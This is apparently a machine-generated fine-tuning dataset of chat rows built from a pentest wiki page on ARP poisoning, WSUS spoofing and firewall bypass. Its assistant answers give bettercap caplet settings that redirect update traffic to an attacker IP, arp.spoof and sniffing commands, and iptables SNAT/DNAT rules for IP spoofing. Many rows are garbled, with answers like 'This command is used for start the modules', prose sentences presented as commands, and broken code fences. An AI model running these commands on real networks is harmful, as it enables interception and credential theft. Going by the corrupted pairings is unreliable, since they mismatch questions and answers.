Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `=== WSUS spoofing`?", "response": "This command is used for start the modules. start the modules", "metadata": {"corpus_index": 802, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/arp-poisoning.md", "page_title": "ARP poisoning", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the Once syntax for start the modules?"}, {"role": "assistant", "content": "Once the WSUS server is up and running, the ARP poisoning attack can start."}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the Once syntax for start the modules?", "response": "Once the WSUS server is up and running, the ARP poisoning attack can start.", "metadata": {"corpus_index": 803, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/arp-poisoning.md", "page_title": "ARP poisoning", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "Once"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do start the modules"}, {"role": "assistant", "content": "Once the WSUS server is up and running, the ARP poisoning attack can start."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do start the modules", "response": "Once the WSUS server is up and running, the ARP poisoning attack can start.", "metadata": {"corpus_index": 803, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/arp-poisoning.md", "page_title": "ARP poisoning", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Once the WSUS server is up and running, the ARP poisoning attack can start.`?"}, {"role": "assistant", "content": "This command is used for start the modules. start the modules"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Once the WSUS server is up and running, the ARP poisoning attack can start.`?", "response": "This command is used for start the modules. start the modules", "metadata": {"corpus_index": 803, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/arp-poisoning.md", "page_title": "ARP poisoning", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe reroute traffic aimed at the WSUS server in the context of penetration testing"}, {"role": "assistant", "content": "set any.proxy.iface $interface\nset any.proxy.protocol TCP\nset any.proxy.src_address $WSUS_server_ip\nset any.proxy.src_port 8530\nset any.proxy.dst_address $attacker_ip\nset any.proxy.dst_port 8530"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe reroute traffic aimed at the WSUS server in the context of penetration testing", "response": "set any.proxy.iface $interface\nset any.proxy.protocol TCP\nset any.proxy.src_address $WSUS_server_ip\nset any.proxy.src_port 8530\nset any.proxy.dst_address $attacker_ip\nset any.proxy.dst_port 8530", "metadata": {"corpus_index": 804, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/arp-poisoning.md", "page_title": "ARP poisoning", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on reroute traffic aimed at the WSUS server"}, {"role": "assistant", "content": "set any.proxy.iface $interface\nset any.proxy.protocol TCP\nset any.proxy.src_address $WSUS_server_ip\nset any.proxy.src_port 8530\nset any.proxy.dst_address $attacker_ip\nset any.proxy.dst_port 8530"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on reroute traffic aimed at the WSUS server", "response": "set any.proxy.iface $interface\nset any.proxy.protocol TCP\nset any.proxy.src_address $WSUS_server_ip\nset any.proxy.src_port 8530\nset any.proxy.dst_address $attacker_ip\nset any.proxy.dst_port 8530", "metadata": {"corpus_index": 804, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/arp-poisoning.md", "page_title": "ARP poisoning", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain start the modules"}, {"role": "assistant", "content": "any.proxy on\narp.spoof on\nnet.sniff on\n``\n\nThe caplet above can be loaded with the following command in order to launch the ARP poisoning attack.\n\n`bash\nbettercap --iface $interface --caplet wsus_spoofing.cap\n`\n\nThe search for Windows updates can be manually triggered when having access to the target computer by going to Settings > Update & Security > Windows Update > Check for updates.\n\n=== Dumping network secrets\n\nStart PCredz or Wireshark then start the poisoning attack\n\n``bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain start the modules", "response": "any.proxy on\narp.spoof on\nnet.sniff on\n``\n\nThe caplet above can be loaded with the following command in order to launch the ARP poisoning attack.\n\n`bash\nbettercap --iface $interface --caplet wsus_spoofing.cap\n`\n\nThe search for Windows updates can be manually triggered when having access to the target computer by going to Settings > Update & Security > Windows Update > Check for updates.\n\n=== Dumping network secrets\n\nStart PCredz or Wireshark then start the poisoning attack\n\n``bash", "metadata": {"corpus_index": 805, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/arp-poisoning.md", "page_title": "ARP poisoning", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through start the modules"}, {"role": "assistant", "content": "any.proxy on\narp.spoof on\nnet.sniff on\n``\n\nThe caplet above can be loaded with the following command in order to launch the ARP poisoning attack.\n\n`bash\nbettercap --iface $interface --caplet wsus_spoofing.cap\n`\n\nThe search for Windows updates can be manually triggered when having access to the target computer by going to Settings > Update & Security > Windows Update > Check for updates.\n\n=== Dumping network secrets\n\nStart PCredz or Wireshark then start the poisoning attack\n\n``bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through start the modules", "response": "any.proxy on\narp.spoof on\nnet.sniff on\n``\n\nThe caplet above can be loaded with the following command in order to launch the ARP poisoning attack.\n\n`bash\nbettercap --iface $interface --caplet wsus_spoofing.cap\n`\n\nThe search for Windows updates can be manually triggered when having access to the target computer by going to Settings > Update & Security > Windows Update > Check for updates.\n\n=== Dumping network secrets\n\nStart PCredz or Wireshark then start the poisoning attack\n\n``bash", "metadata": {"corpus_index": 805, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/arp-poisoning.md", "page_title": "ARP poisoning", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the The syntax for start the modules?"}, {"role": "assistant", "content": "The caplet above can be loaded with the following command in order to launch the ARP poisoning attack."}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the The syntax for start the modules?", "response": "The caplet above can be loaded with the following command in order to launch the ARP poisoning attack.", "metadata": {"corpus_index": 806, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/arp-poisoning.md", "page_title": "ARP poisoning", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "The"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on start the modules"}, {"role": "assistant", "content": "The caplet above can be loaded with the following command in order to launch the ARP poisoning attack."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on start the modules", "response": "The caplet above can be loaded with the following command in order to launch the ARP poisoning attack.", "metadata": {"corpus_index": 806, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/arp-poisoning.md", "page_title": "ARP poisoning", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `The caplet above can be loaded with the following command in order to launch the ARP poisoning attack.`?"}, {"role": "assistant", "content": "This command is used for start the modules. start the modules"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `The caplet above can be loaded with the following command in order to launch the ARP poisoning attack.`?", "response": "This command is used for start the modules. start the modules", "metadata": {"corpus_index": 806, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/arp-poisoning.md", "page_title": "ARP poisoning", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the The syntax for start the modules?"}, {"role": "assistant", "content": "The search for Windows updates can be manually triggered when having access to the target computer by going to `Settings > Update & Security > Windows Update > Check for updates`.\n\n\n=== Dumping network secrets\n\nStart [PCredz](https://github.com/lgandx/PCredz) or Wireshark then start the poisoning attack"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the The syntax for start the modules?", "response": "The search for Windows updates can be manually triggered when having access to the target computer by going to `Settings > Update & Security > Windows Update > Check for updates`.\n\n\n=== Dumping network secrets\n\nStart [PCredz](https://github.com/lgandx/PCredz) or Wireshark then start the poisoning attack", "metadata": {"corpus_index": 807, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/arp-poisoning.md", "page_title": "ARP poisoning", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "The"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for start the modules?"}, {"role": "assistant", "content": "The search for Windows updates can be manually triggered when having access to the target computer by going to `Settings > Update & Security > Windows Update > Check for updates`.\n\n\n=== Dumping network secrets\n\nStart [PCredz](https://github.com/lgandx/PCredz) or Wireshark then start the poisoning attack"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for start the modules?", "response": "The search for Windows updates can be manually triggered when having access to the target computer by going to `Settings > Update & Security > Windows Update > Check for updates`.\n\n\n=== Dumping network secrets\n\nStart [PCredz](https://github.com/lgandx/PCredz) or Wireshark then start the poisoning attack", "metadata": {"corpus_index": 807, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/arp-poisoning.md", "page_title": "ARP poisoning", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `The search for Windows updates can be manually triggered when having access to the target computer by going to `Settings > Update & Security > Windows Update > Check for updates`.`?"}, {"role": "assistant", "content": "This command is used for start the modules. start the modules"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `The search for Windows updates can be manually triggered when having access to the target computer by going to `Settings > Update & Security > Windows Update > Check for updates`.`?", "response": "This command is used for start the modules. start the modules", "metadata": {"corpus_index": 807, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/arp-poisoning.md", "page_title": "ARP poisoning", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe set the ARP poisoning in the context of penetration testing"}, {"role": "assistant", "content": "set arp.spoof.targets $client_ip\nset arp.spoof.internal true\nset arp.spoof.fullduplex true"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe set the ARP poisoning in the context of penetration testing", "response": "set arp.spoof.targets $client_ip\nset arp.spoof.internal true\nset arp.spoof.fullduplex true", "metadata": {"corpus_index": 808, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/arp-poisoning.md", "page_title": "ARP poisoning", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through set the ARP poisoning"}, {"role": "assistant", "content": "set arp.spoof.targets $client_ip\nset arp.spoof.internal true\nset arp.spoof.fullduplex true"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through set the ARP poisoning", "response": "set arp.spoof.targets $client_ip\nset arp.spoof.internal true\nset arp.spoof.fullduplex true", "metadata": {"corpus_index": 808, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/arp-poisoning.md", "page_title": "ARP poisoning", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe start the modules in the context of penetration testing"}, {"role": "assistant", "content": "arp.spoof on\nnet.sniff on\n``\n\n:::\n\n::: details Alternative using arpspoof` tool - Firewall Bypass scenario"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe start the modules in the context of penetration testing", "response": "arp.spoof on\nnet.sniff on\n``\n\n:::\n\n::: details Alternative using arpspoof` tool - Firewall Bypass scenario", "metadata": {"corpus_index": 809, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/arp-poisoning.md", "page_title": "ARP poisoning", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on start the modules"}, {"role": "assistant", "content": "arp.spoof on\nnet.sniff on\n``\n\n:::\n\n::: details Alternative using arpspoof` tool - Firewall Bypass scenario"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on start the modules", "response": "arp.spoof on\nnet.sniff on\n``\n\n:::\n\n::: details Alternative using arpspoof` tool - Firewall Bypass scenario", "metadata": {"corpus_index": 809, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/arp-poisoning.md", "page_title": "ARP poisoning", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about ARP poisoning - Combining ARP poisoning and IP spoofing to bypass firewall?"}, {"role": "assistant", "content": "The goal of this attack is to bypass the firewall protecting a sensitive network and be able the access an asset there. \n\nTo do so, the attacker's machine sits as MITM between the DNS server (referred to as the target of the ARP Spoofing, which is authorized to communicate with the sensitive asset in the protected network), and the firewall controlling the access to the protected network.\\\nIn addition to this, the attacker spoofs the IP address of the DNS server when communicating with the sensitive asset and tags its traffic through dynamic ports to be able to track it and handle the response to its spoofed requests. \n\nBelow is a diagram to visualize the attack:\n\n!Bypass WAF through ARP spoofing and IP Spoofing - attack diagram\n\nIP spoofing \n\nThis part is done using iptables NAT rules.\n\n```"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about ARP poisoning - Combining ARP poisoning and IP spoofing to bypass firewall?", "response": "The goal of this attack is to bypass the firewall protecting a sensitive network and be able the access an asset there. \n\nTo do so, the attacker's machine sits as MITM between the DNS server (referred to as the target of the ARP Spoofing, which is authorized to communicate with the sensitive asset in the protected network), and the firewall controlling the access to the protected network.\\\nIn addition to this, the attacker spoofs the IP address of the DNS server when communicating with the sensitive asset and tags its traffic through dynamic ports to be able to track it and handle the response to its spoofed requests. \n\nBelow is a diagram to visualize the attack:\n\n!Bypass WAF through ARP spoofing and IP Spoofing - attack diagram\n\nIP spoofing \n\nThis part is done using iptables NAT rules.\n\n```", "metadata": {"corpus_index": 810, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/arp-poisoning.md", "page_title": "ARP poisoning", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for ARP poisoning - Combining ARP poisoning and IP spoofing to bypass firewall"}, {"role": "assistant", "content": "The goal of this attack is to bypass the firewall protecting a sensitive network and be able the access an asset there. \n\nTo do so, the attacker's machine sits as MITM between the DNS server (referred to as the target of the ARP Spoofing, which is authorized to communicate with the sensitive asset in the protected network), and the firewall controlling the access to the protected network.\\\nIn addition to this, the attacker spoofs the IP address of the DNS server when communicating with the sensitive asset and tags its traffic through dynamic ports to be able to track it and handle the response to its spoofed requests. \n\nBelow is a diagram to visualize the attack:\n\n!Bypass WAF through ARP spoofing and IP Spoofing - attack diagram\n\nIP spoofing \n\nThis part is done using iptables NAT rules.\n\n```"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for ARP poisoning - Combining ARP poisoning and IP spoofing to bypass firewall", "response": "The goal of this attack is to bypass the firewall protecting a sensitive network and be able the access an asset there. \n\nTo do so, the attacker's machine sits as MITM between the DNS server (referred to as the target of the ARP Spoofing, which is authorized to communicate with the sensitive asset in the protected network), and the firewall controlling the access to the protected network.\\\nIn addition to this, the attacker spoofs the IP address of the DNS server when communicating with the sensitive asset and tags its traffic through dynamic ports to be able to track it and handle the response to its spoofed requests. \n\nBelow is a diagram to visualize the attack:\n\n!Bypass WAF through ARP spoofing and IP Spoofing - attack diagram\n\nIP spoofing \n\nThis part is done using iptables NAT rules.\n\n```", "metadata": {"corpus_index": 810, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/arp-poisoning.md", "page_title": "ARP poisoning", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Change the source port range of the attacker host, this is only to make sure port range size is the same as the one of the spoofed traffic (20000-30000)?"}, {"role": "assistant", "content": "echo \"40000 50000\" > /proc/sys/net/ipv4/ip_local_port_range"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Change the source port range of the attacker host, this is only to make sure port range size is the same as the one of the spoofed traffic (20000-30000)?", "response": "echo \"40000 50000\" > /proc/sys/net/ipv4/ip_local_port_range", "metadata": {"corpus_index": 811, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/arp-poisoning.md", "page_title": "ARP poisoning", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Change the source port range of the attacker host, this is only to make sure port range size is the same as the one of the spoofed traffic (20000-30000)"}, {"role": "assistant", "content": "echo \"40000 50000\" > /proc/sys/net/ipv4/ip_local_port_range"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Change the source port range of the attacker host, this is only to make sure port range size is the same as the one of the spoofed traffic (20000-30000)", "response": "echo \"40000 50000\" > /proc/sys/net/ipv4/ip_local_port_range", "metadata": {"corpus_index": 811, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/arp-poisoning.md", "page_title": "ARP poisoning", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Spoof the source IP address of the outgoing traffic and modify the source ports to tag the spoofed traffic. work?"}, {"role": "assistant", "content": "iptables -t nat -A POSTROUTING -s \"ATTACKER_IP\"/32 -o \"NETWORK_INTERFACE\" -p tcp -j SNAT --to-source \"TARGET_IP\":20000-30000"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Spoof the source IP address of the outgoing traffic and modify the source ports to tag the spoofed traffic. work?", "response": "iptables -t nat -A POSTROUTING -s \"ATTACKER_IP\"/32 -o \"NETWORK_INTERFACE\" -p tcp -j SNAT --to-source \"TARGET_IP\":20000-30000", "metadata": {"corpus_index": 812, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/arp-poisoning.md", "page_title": "ARP poisoning", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Spoof the source IP address of the outgoing traffic and modify the source ports to tag the spoofed traffic.?"}, {"role": "assistant", "content": "iptables -t nat -A POSTROUTING -s \"ATTACKER_IP\"/32 -o \"NETWORK_INTERFACE\" -p tcp -j SNAT --to-source \"TARGET_IP\":20000-30000"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Spoof the source IP address of the outgoing traffic and modify the source ports to tag the spoofed traffic.?", "response": "iptables -t nat -A POSTROUTING -s \"ATTACKER_IP\"/32 -o \"NETWORK_INTERFACE\" -p tcp -j SNAT --to-source \"TARGET_IP\":20000-30000", "metadata": {"corpus_index": 812, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/arp-poisoning.md", "page_title": "ARP poisoning", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Identify the response to the spoofed traffic and change destination IP of the target to the one of the attacker's host"}, {"role": "assistant", "content": "iptables -t nat -A PREROUTING -d \"TARGET_IP\"/32 -i \"NETWORK_INTERFACE\" -p tcp -m tcp --dport 20000:30000 -j DNAT --to-destination \"ATTACKER_IP\":40000-50000\n\n``\n\nARP spoofing (MITM)\\\nTo perform the ARP spoofing part, arpspoof (python2) is used. Both the DNS server and the firewall are poisoned (proxy mode). \n\n``"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Identify the response to the spoofed traffic and change destination IP of the target to the one of the attacker's host", "response": "iptables -t nat -A PREROUTING -d \"TARGET_IP\"/32 -i \"NETWORK_INTERFACE\" -p tcp -m tcp --dport 20000:30000 -j DNAT --to-destination \"ATTACKER_IP\":40000-50000\n\n``\n\nARP spoofing (MITM)\\\nTo perform the ARP spoofing part, arpspoof (python2) is used. Both the DNS server and the firewall are poisoned (proxy mode). \n\n``", "metadata": {"corpus_index": 813, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/arp-poisoning.md", "page_title": "ARP poisoning", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Identify the response to the spoofed traffic and change destination IP of the target to the one of the attacker's host"}, {"role": "assistant", "content": "iptables -t nat -A PREROUTING -d \"TARGET_IP\"/32 -i \"NETWORK_INTERFACE\" -p tcp -m tcp --dport 20000:30000 -j DNAT --to-destination \"ATTACKER_IP\":40000-50000\n\n``\n\nARP spoofing (MITM)\\\nTo perform the ARP spoofing part, arpspoof (python2) is used. Both the DNS server and the firewall are poisoned (proxy mode). \n\n``"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Identify the response to the spoofed traffic and change destination IP of the target to the one of the attacker's host", "response": "iptables -t nat -A PREROUTING -d \"TARGET_IP\"/32 -i \"NETWORK_INTERFACE\" -p tcp -m tcp --dport 20000:30000 -j DNAT --to-destination \"ATTACKER_IP\":40000-50000\n\n``\n\nARP spoofing (MITM)\\\nTo perform the ARP spoofing part, arpspoof (python2) is used. Both the DNS server and the firewall are poisoned (proxy mode). \n\n``", "metadata": {"corpus_index": 813, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/arp-poisoning.md", "page_title": "ARP poisoning", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the ARP command to identify the response to the spoofed traffic and change destination ip of the target to the one of the attacker's host"}, {"role": "assistant", "content": "ARP spoofing (MITM)\\\nTo perform the ARP spoofing part, [arpspoof](https://github.com/ickerwx/arpspoof) (python2) is used. Both the DNS server and the firewall are poisoned ([proxy mode](arp-poisoning.md#proxy-vs.-rerouting))."}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the ARP command to identify the response to the spoofed traffic and change destination ip of the target to the one of the attacker's host", "response": "ARP spoofing (MITM)\\\nTo perform the ARP spoofing part, [arpspoof](https://github.com/ickerwx/arpspoof) (python2) is used. Both the DNS server and the firewall are poisoned ([proxy mode](arp-poisoning.md#proxy-vs.-rerouting)).", "metadata": {"corpus_index": 814, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/arp-poisoning.md", "page_title": "ARP poisoning", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "ARP"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Identify the response to the spoofed traffic and change destination IP of the target to the one of the attacker's host?"}, {"role": "assistant", "content": "ARP spoofing (MITM)\\\nTo perform the ARP spoofing part, [arpspoof](https://github.com/ickerwx/arpspoof) (python2) is used. Both the DNS server and the firewall are poisoned ([proxy mode](arp-poisoning.md#proxy-vs.-rerouting))."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. 